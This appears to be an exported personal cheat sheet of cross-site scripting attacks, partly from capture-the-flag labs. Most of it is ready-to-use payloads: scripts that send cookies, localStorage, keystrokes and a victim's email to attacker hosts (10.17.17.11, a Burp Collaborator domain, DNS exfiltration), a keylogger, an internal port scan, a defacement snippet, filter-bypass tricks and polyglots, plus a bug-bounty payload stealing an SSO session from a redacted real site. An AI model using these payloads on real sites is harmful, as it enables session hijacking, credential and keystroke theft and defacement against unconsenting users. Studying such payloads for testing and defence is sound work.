<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>XSS</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>XSS</h1>

      <div class="ck-content">
        <p>User input is not HTML entity encoded and this may lead to cross site
          scripting (XSS). In a web application where a user’s input is reflected
          i always try to test for either PHP code injection or cross site scripting
          and I’ve been lucky in more times that one.</p>
        <p>Looking at the source code of the web application we notice that our message
          is wrapped between textarea tags</p>
        <p>Sometimes, cookies can be injected directly, with something like base64
          encoding the payload </p>
        <p><code>&lt;script src='http://10.17.17.11/p.js'&gt;&lt;/script&gt;</code> and
          instead of document.cookie, try <code>+JSON.stringify(localStorage)</code> as
          well.</p>
        <p>For defacing website, using tags such title etc.,</p>
        <p><code>&lt;script&gt;document.querySelector('title').textContent = 'Resolve XSS plz'&lt;/script&gt;</code>

        </p>
        <p>for stealing session ids:</p>
        <p><code>&lt;script&gt;window.location='http://10.17.17.11/?cookie='+document.cookie&lt;/script&gt;</code>

        </p>
        <p>for machine ip(reflected):</p>
        <p><code>&lt;script&gt;alert(window.location.hostname)&lt;/script&gt;</code>

        </p>
        <p>DOM XSS:</p>
        <p><code>test" onmouseover="alert('Hover over the image and inspect the image element')"</code>

        </p>
        <p>XSS PORT SCAN:</p><pre><code class="language-text-plain">&lt;script&gt;
 for (let i = 0; i &lt; 256; i++) { 
  let ip = '192.168.0.' + i 

  let code = '&lt;img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '"&gt;'
  document.body.innerHTML += code 
 } 
&lt;/script&gt;</code></pre>

         <h2><span style="color:hsl(0, 0%, 90%)">XSS Keylogger:</span></h2><pre><code class="language-text-plain">&lt;script type="text/javascript"&gt;
 let l = ""; // Variable to store key-strokes in
 document.onkeypress = function (e) { // Event to listen for key presses
   l += e.key; // If user types, log it to the l variable
   console.log(l); // update this line to post to your own server
 }
&lt;/script&gt;</code></pre>

        <p><span style="background-color:transparent;color:rgb(14,16,26)"><strong>Session Stealing:</strong></span>

        </p>
        <p><span style="background-color:transparent;color:rgb(14,16,26)">Details of a user's session, such as login tokens, are often kept in cookies on the targets machine. The below JavaScript takes the target's cookie, base64 encodes the cookie to ensure successful transmission and then posts it to a website under the hacker's control to be logged. Once the hacker has these cookies, they can take over the target's session and be logged as that user.</span>

        </p>
        <p><code>&lt;script&gt;fetch('https://10.17.17.11/steal?cookie=' + btoa(document.cookie));&lt;/script&gt;</code>

        </p>
        <p><span style="background-color:transparent;color:rgb(14,16,26)"><strong>Key Logger:</strong></span>

        </p>
        <p><span style="background-color:transparent;color:rgb(14,16,26)">The below code acts as a key logger. This means anything you type on the webpage will be forwarded to a website under the hacker's control. This could be very damaging if the website the payload was installed on accepted user logins or credit card details.</span>

        </p>
        <p><code>&lt;script&gt;document.onkeypress = function(e) { fetch('https://10.17.17.11/log?key=' + btoa(e.key) );}&lt;/script&gt;</code>

        </p>
        <p>The application doesn't check the contents of the <strong>error</strong> parameter,
          which allows the attacker to insert malicious code.</p>
        <figure class="image image_resized"
        style="width:63.02%">
          <img src="XSS/image.png" />
        </figure>
        <p><strong>How to test for Reflected XSS:</strong>

          <br /> </p>
        <p>You'll need to test every possible point of entry; these include:</p>
        <ul>
          <li>Parameters in the URL Query String</li>
          <li>URL File Path</li>
          <li>Sometimes HTTP Headers (although unlikely exploitable in practice)</li>
        </ul>
        <p>for reflected xss, we used a web server(ruby) on port 8080 and made request
          to it through js script with document.location</p>
        <p><strong>How to test for Stored XSS:</strong>

        </p>
        <p>You'll need to test every possible point of entry where it seems data
          is stored and then shown back in areas that other users have access to;
          a small example of these could be:</p>
        <ul>
          <li>Comments on a blog</li>
          <li>User profile information</li>
          <li>Website Listings</li>
          <li>an age field that is expecting an integer from a dropdown menu, but instead,
            you manually send the request rather than using the form allowing you to
            try malicious payloads. </li>
        </ul>
        <p><strong>Exploiting the DOM</strong>

        </p>
        <p>DOM Based XSS is where the JavaScript execution happens directly in the
          browser without any new pages being loaded or data submitted to backend
          code. Execution occurs when the website JavaScript code acts on input or
          user interaction.
          <br />
          <br /><strong>Example Scenario:</strong>

          <br />
          <br />The website's JavaScript gets the contents from the <code>window.location.hash</code> parameter
          and then writes that onto the page in the currently being viewed section.
          The contents of the hash aren't checked for malicious code, allowing an
          attacker to inject JavaScript of their choosing onto the webpage.</p>
        <p><span style="background-color:transparent;color:rgb(14,16,26)"><strong>How to test for Dom Based XSS:</strong></span>

          <br
          /><span style="background-color:transparent;color:rgb(14,16,26)">DOM Based XSS can be challenging to test for and requires a certain amount of knowledge of JavaScript to read the source code. You'd need to look for parts of the code that access certain variables that an attacker can have control over, such as "<strong>window.location.x</strong>" parameters.</span>

        </p>
        <p><span style="background-color:transparent;color:rgb(14,16,26)">When you've found those bits of code, you'd then need to see how they are handled and whether the values are ever written to the web page's DOM or passed to unsafe JavaScript methods such as <strong>eval()</strong>.</span>

        </p>
         <h2><span style="background-color:transparent;color:rgb(14,16,26)"><strong>PAYLOADS</strong></span></h2>

        <p><code>&lt;script&gt;alert('THM');&lt;/script&gt; when it's input is directly taken without any tags</code>

        </p>
        <p><code>"&gt;&lt;script&gt;alert('THM');&lt;/script&gt; when input tag is used</code>

        </p>
        <p><code>&lt;/textarea&gt;&lt;script&gt;alert('THM');&lt;/script&gt;</code> for
          textarea tag</p>
        <p><code>&lt;img src="api/images/YdG5uwpup3lb/blah" ONERROR="alert('Hello')" /&gt;</code>

        </p>
        <p><code>&lt;img src="api/images/YdG5uwpup3lb/blah" onerror=confirm("Hello") /&gt;</code>

        </p>
        <p><code>&lt;sscriptcript&gt;alert('THM');&lt;/sscriptcript&gt;</code>

        </p>
        <p><code>&lt;img src="api/images/YdG5uwpup3lb/blah" ONERROR="alert('HHelloello')" /&gt;</code>

        </p>
        <p>If input is taken inside a &lt;script&gt; tag as shown in image, then
          use <code>';alert('THM');//</code>

        </p>
        <p>
          <img src="XSS/1_image.png" />
        </p>
        <p>When a word gets removed from a string due to filter, there's a helpful
          trick that you can try.
          <br />
          <img class="image_resized" style="width:44.53%" src="XSS/2_image.png"
          />
        </p>
        <p>You can see that the &lt; and &gt; characters get filtered out from our
          payload, preventing us from escaping the IMG tag. To get around the filter,
          we can take advantage of the additional attributes of the IMG tag, such
          as the onload event. The onload event executes the code of your choosing
          once the image specified in the src attribute has loaded onto the web page.</p>
        <p><code>/images/cat.jpg" onload="alert('THM');</code>

        </p>
        <p><span style="background-color:transparent;color:rgb(14,16,26)"><strong>Polyglots:</strong></span>

        </p>
        <p><span style="background-color:transparent;color:rgb(14,16,26)">An XSS polyglot is a string of text which can escape attributes, tags and bypass filters all in one. You could have used the below polyglot on all six levels you've just completed, and it would have executed the code successfully. </span>

        </p>
        <p><code>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert('THM')//&gt;\x3e</code>

        </p>
        <p> </p>
         <h2>Immediately invoked function expression</h2>

        <p>An immediately invoked function expression is a programming language idiom
          which produces a lexical scope using function scoping.</p>
        <p>After fuzzing for a while I bypassed the restriction using the iife function
          and the alert box popped up with the following payload:</p>
        <blockquote>
          <p><a href="https://www.redacted.com/preview/001981ba?blogPostId=test123&quot;;(alert)(&quot;xss&quot;)//"><code><i>https://www.redacted.com/preview/001981ba?blogPostId=test123";(alert)("xss")//</i></code></a>

          </p>
          <p><code><i>";fetch('https://www.redacted.com/api/uis/accounts/current/sso').then(a=&gt; a.text()).then(a=&gt; fetch('https://random.burpcollaborator.net?x='+a))//</i></code>

          </p>
        </blockquote>
        <p><strong>Explanation:</strong> Here I am using the fetch() method of javascript
          in my payload that instructs the web browsers to send a request to a URL.
          The first fetch() sends a GET request to this api endpoint <i>https://www.redacted.com/api/uis/accounts/current/sso</i> (leaking
          session id) which we can use to hijack the account. <code><strong>(a=&gt; a.text())</strong></code><strong> </strong>return
          the data into the <code><strong>a</strong></code><strong> </strong>variable<strong>. </strong>After
          that second fetch() function is used to send another GET request to send
          the stolen data into the attacker control server. For that purpose I simply
          used Burp Collaborator.</p>
        <p>working payload :</p>
        <p><code>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=window.location="http://10.17.17.11/" + document.getElementById("title")//&gt;\x3e</code>

        </p>
        <p><code>&lt;/textarea&gt;&lt;script&gt;var i = new Image(); i.src="//TEST.8ba7c46d7ea59d575b71ef3126651b6a.log.tryhackme.tech/?c="+document.getElementById('email').innerHTML; &lt;/script&gt;</code>

        </p>
        <p>for viewing email with XSS:</p><pre><code class="language-text-plain">&lt;/textarea&gt;&lt;script&gt;
var email = document.getElementById("email").innerText;
email = email.replace("@", "8")
email = email.replace(".", "0")
document.location = "http://"+ email +".8ba7c46d7ea59d575b71ef3126651b6a.log.tryhackme.tech"&lt;/script&gt;</code></pre>

        <p>Sometimes, http requests are blocked so we can use dns to exfill our data
          as shown in the script above.</p>
         <h2>Filter Evasion</h2>

        <p>If tags <code>&lt;&gt;</code> are filtered, we can use <code>&amp;lt</code> and <code>&amp;gt</code> ,
          these have to be suffixed by <code>;</code>, as script is filtered we take
          advantage and depend on it being filtered to render script again with <code>sscriptcript</code>,
          finally try strings and numbers, you never know what might be filtered.</p>
        <p><code>&amp;lt;sscriptcript&amp;gt;alert('1')&amp;lt;/sscriptcript&amp;gt;</code>

        </p>
        <p><code>&amp;lt;sscriptcript&amp;gt;window.location='http://10.17.17.11/cookie=' +document.cookie;&amp;lt;/sscriptcript&amp;gt;</code>

        </p>
        <p> </p>
      </div>
    </div>
  </body>

</html>